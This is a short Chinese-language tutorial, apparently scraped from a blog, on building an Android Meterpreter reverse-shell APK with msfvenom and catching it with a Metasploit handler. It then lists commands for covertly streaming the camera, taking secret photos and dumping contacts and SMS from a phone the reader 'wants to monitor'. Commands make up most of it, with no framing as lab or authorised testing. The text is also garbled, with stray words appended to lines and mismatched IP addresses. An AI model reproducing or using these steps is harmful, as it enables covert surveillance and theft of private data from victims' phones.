ifconfig查看kali的ip,ip为222.222.221.140android
输入命令:web
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apktcp
这里的5555是设置的端口,也能够本身更改,显示这个说明已经生成成功 只有9K多大小spa
输入命令:.net
msfconsole3d
启动msfconsoleblog
在控制台中输入ip
use exploit/multi/handler //加载模块it
set payload android/meterpreter/reverse_tcp //选择Payloadio
show options //查看参数设置
这里须要设置LHOST的ip地址,也就是你的kali的ip地址
还有LPORT端口,刚才设置的为5555,也须要更改一下(刚才直接设置为4444也是能够的)
set LHOST 192.168.1.114 //这里的地址设置成咱们刚才生成木马的IP地址
set LPORT 5555 //这里的端口设置成刚才咱们生成木马所监听的端口
exploit //开始执行漏洞 开始监听,等待手机上线
接下来就要把生成的apk装在你想监控的手机上了,等待手机上线了
而后能够输入sysinfo 查看手机信息
webcam_list 查看手机有多少个摄像头 这里显示是2个
webcam_stream //开启摄像头
webcam_snap //隐秘拍照功能
dump_contacts //导出电话号码
dump_sms //导出信息
导出的文件拍的照片都会在root下面
能够输入?查看更多命令
参考:https://blog.csdn.net/langtuteng17/article/details/80444115